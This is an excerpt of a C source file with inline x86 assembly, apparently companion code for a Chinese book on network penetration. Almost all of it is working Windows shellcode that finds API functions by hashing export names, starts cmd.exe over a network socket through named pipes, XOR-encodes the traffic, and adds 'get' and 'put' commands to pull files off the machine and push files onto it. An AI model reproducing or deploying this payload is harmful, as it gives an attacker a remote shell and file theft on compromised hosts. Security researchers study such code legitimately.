📄 shellcode_fun.c

📁 网络渗透技术配书源码
💻 C
        push    0x5C2E5C5C                      ; "\\.\pipe\0"        mov     edi, esp                xor     eax, eax        push    eax        push    eax        push    eax        push    eax        push    0xff                            ; UNLIMITED_INSTANCES        push    eax                             ; TYPE_BYTE|READMODE_BYTE|WAIT        push    0x40000003                      ; ACCES_DUPLEX|FLAG_OVERLAPPED        push    edi                             ; pip="\\.\pipe\0"        call    dword ptr [esi+_CreateNamedPipeA]        mov     [esi+_hout1], eax                xor     eax, eax        push    eax        push    eax        push    3                               ; OPEN_EXISTING        push    ebx                             ; lap        push    eax        push    0x02000000                      ; MAXIMUM_ALLOWED        push    edi                             ; pip="\\.\pipe\0"        call    dword ptr [esi+_CreateFileA]        mov     [esi+_hout0], eax                push    646D63h                         ; "cmd"        lea     edx, [esp]        sub     esp, 54h        mov     edi, esp        push    14h        pop     ecx        xor     eax, eax        stack_zero:        mov     [edi+ecx*4], eax        loop    stack_zero        mov     byte ptr [edi+10h], 44h         ; si.cb = sizeof(si)        inc     byte ptr [edi+3Ch]        inc     byte ptr [edi+3Dh]              ; si.flg=USESHOWWINDOW|USESTDHANDLES        push    [esi+_hin1]        pop     ebx        mov     [edi+48h], ebx                  ; si.stdinput        push    [esi+_hout0]        pop     ebx        mov     [edi+4Ch], ebx                  ; si.stdoutput        mov     [edi+50h], ebx                  ; si.stderror        lea     eax, [edi+10h]        push    edi        push    eax        push    ecx        push    ecx        push    ecx        push    1                               ; inherit=TRUE        push    ecx        push    ecx        push    edx                             ; "cmd" 
       push    ecx        call    dword ptr [esi+_CreateProcessA]                push    [edi]        pop     dword ptr [esi+_pi0]        push    [edi+4]        pop     dword ptr [esi+_pi1]                push    [esi+_hin1]        call    dword ptr [esi+_CloseHandle]        push    [esi+_hout0]        call    dword ptr [esi+_CloseHandle]                add     esp, 0x6C                       ; free sa struct and "\\.\pipe\0" string and si struct                xor     eax, eax        push    eax        push    1        push    1        push    eax        call    dword ptr [esi+_CreateEventA]        mov     [esi+_epip], eax                xor     ebx, ebx        mov     [esi+_lap+0x0C], ebx        mov     [esi+_lap+0x10], eax                call    dword ptr [esi+_WSACreateEvent]        mov     [esi+_esck], eax        mov     dword ptr [esi+_flg], 0k1:        push    0x21                            ; FD_READ|FD_CLOSE        push    [esi+_esck]        push    [esi+_hsck]        call    dword ptr [esi+_WSAEventSelect]        xor     eax, eax        dec     eax        push    eax        inc     eax        push    eax        lea     ebx, [esi+_epip]        push    ebx        push    2        call    dword ptr [esi+_WaitForMultipleObjects]        push    eax                lea     ebx, [esi+_sbuf]        push    ebx        push    [esi+_esck]        push    [esi+_hsck]        call    dword ptr [esi+_WSAEnumNetworkEvents]                push    0        push    dword ptr [esi+_esck]        push    dword ptr [esi+_hsck]        call    dword ptr [esi+_WSAEventSelect]                push    0        push    esp        push    0x8004667e        push    [esi+_hsck]        call    dword ptr [esi+_ioctlsocket]        pop     eax                pop     ecx                                     ;        jecxz   k2        dec     ecx        jnz     k5                push    0        push    0x40        lea     edx, [esi+_sbuf]        push    edx        push    [esi+_hsck]        
call    dword ptr [esi+_recv]                lea     edx, [esi+_sbuf]        push    eax        pop     ecx        call    xor_data                //+-------------------------------------------        // Add file download and upload function        // 2004-06-09        //        // san        //+-------------------------------------------        cmp     dword ptr [esi+_sbuf], 0x20746567       ; "get "        jz      get_file        cmp     dword ptr [esi+_sbuf], 0x20747570       ; "put "        jz      put_file        restore:        push    0        lea     ebx, [esi+_cnt]        push    ebx        push    eax                                     ; size        lea     ebx, [esi+_sbuf]        push    ebx        push    [esi+_hin0]        call    [esi+_WriteFile]        k2:        mov     ecx, [esi+_flg]        jecxz   k3        push    eax        lea     ebx, [esi+_cnt]        push    ebx        lea     ebx, [esi+_lap]        push    ebx        push    [esi+_hout1]        call    dword ptr [esi+_GetOverlappedResult]        xchg    eax, ecx        jecxz   k5        jmp     k4        k3:        lea     ebx, [esi+_lap]        push    ebx        lea     ebx, [esi+_cnt]        push    ebx        push    0x40        lea     ebx, [esi+_pbuf]        push    ebx        push    [esi+_hout1]        call    dword ptr [esi+_ReadFile]        inc     dword ptr [esi+_flg]        test    eax, eax        jz      k1        k4:        lea     edx, [esi+_pbuf]        push    [esi+_cnt]        pop     ecx        call    xor_data                dec     dword ptr [esi+_flg]        push    0        mov     ebx, [esi+_cnt]        push    ebx        lea     ebx, [esi+_pbuf]        push    ebx        push    [esi+_hsck]        call    dword ptr [esi+_send]        jmp     k1k5:        push    [esi+_pi0]        call    dword ptr [esi+_TerminateProcess]                push    [esi+_pi0]        push    [esi+_pi1]        push    [esi+_hout1]        push    [esi+_hin0]        call    dword ptr 
[esi+_CloseHandle]        call    dword ptr [esi+_CloseHandle]        call    dword ptr [esi+_CloseHandle]        call    dword ptr [esi+_CloseHandle]                push    [esi+_hsck]        call    dword ptr [esi+_closesocket]                xor     eax, eax        dec     eax        push    eax        call    dword ptr [esi+_TerminateProcess]get_file:        mov     byte ptr [esi+_sbuf+eax-1], 0        lea     edx, [esi+_sbuf+4]              ; "get " filename        xor     eax, eax        push    eax        push    eax        push    3                               ; OPEN_EXISTING        push    eax                             ; lap        push    eax        push    0x02000000                      ; MAXIMUM_ALLOWED        push    edx        call    dword ptr [esi+_CreateFileA]        mov     [esi+_hout0], eax            transfer:        push    0                               ; null or &lap        lea     edx, [esi+_cnt]        push    edx                             ; read size actualy        push    0x40                            ; read size        lea     edx, [esi+_pbuf]        push    edx        push    [esi+_hout0]        call    dword ptr [esi+_ReadFile]        mov     ecx, [esi+_cnt]        jecxz   transfer_finish                 ; None to read                lea     edx, [esi+_pbuf]        call    xor_data        push    0        push    [esi+_cnt]        lea     edx, [esi+_pbuf]        push    edx        push    [esi+_hsck]        call    dword ptr [esi+_send]        jmp     transfer    transfer_finish:        push    [esi+_hout0]        call    dword ptr [esi+_CloseHandle]        jmp     k1put_file:        mov     byte ptr [esi+_sbuf+eax-1], 0        lea     edx, [esi+_sbuf+4]              ; filename after "put "        xor     eax, eax        push    eax        push    eax        push    2                               ; CREATE_ALWAYS        push    eax                             ; lap        push    eax        push    0x02000000                  
    ; MAXIMUM_ALLOWED        push    edx        call    dword ptr [esi+_CreateFileA]        mov     [esi+_hout0], eax    upload:        push    0        push    0x40        lea     edx, [esi+_pbuf]        push    edx        push    [esi+_hsck]        call    dword ptr [esi+_recv]                lea     edx, [esi+_pbuf]        push    eax        pop     ecx        call    xor_data        push    0        lea     edx, [esi+_cnt]        push    edx        push    eax        lea     edx, [esi+_pbuf]        push    edx        push    [esi+_hout0]        call    dword ptr [esi+_WriteFile]        push    0        push    esp        push    4004667Fh        push    [esi+_hsck]        call    dword ptr [esi+_ioctlsocket]        pop     ecx        jecxz   upload_finish                        jmp upload            upload_finish:        push    [esi+_hout0]        call    dword ptr [esi+_CloseHandle]        mov     byte ptr [esi+_sbuf], 0x0a        push    1h        pop     eax        jmp     restorexor_data:        dec     edx        xor_work:        xor     byte ptr [edx+ecx], Xor_key        loop    xor_work        retfind_hashfunc_addr:        push    ecx        push    esi        mov     esi, [ebp+3Ch]                  ; e_lfanew        mov     esi, [esi+ebp+78h]              ; ExportDirectory RVA        add     esi, ebp                        ; rva2va        push    esi        mov     esi, [esi+20h]                  ; AddressOfNames RVA        add     esi, ebp                        ; rva2va        xor     ecx, ecx        dec     ecx                find_start:        inc     ecx        lodsd        add     eax, ebp        xor     ebx, ebx                hash_loop:        movsx   edx, byte ptr [eax]        cmp     dl, dh        jz      short find_addr        ror     ebx, 7                          ; hash        add     ebx, edx        inc     eax        jmp     short hash_loop             find_addr:        cmp     ebx, [edi]                      ; compare to hash        
jnz     short find_start        pop     esi                             ; ExportDirectory        mov     ebx, [esi+24h]                  ; AddressOfNameOrdinals RVA        add     ebx, ebp                        ; rva2va        mov     cx, [ebx+ecx*2]                 ; FunctionOrdinal        mov     ebx, [esi+1Ch]                  ; AddressOfFunctions RVA        add     ebx, ebp                        ; rva2va        mov     eax, [ebx+ecx*4]                ; FunctionAddress RVA        add     eax, ebp                        ; rva2va        stosd                                   ; function address save to [edi]        pop     esi        pop     ecx        retn        locate_addr:        call    func_startPROC_END      //C macro to end proc        }}
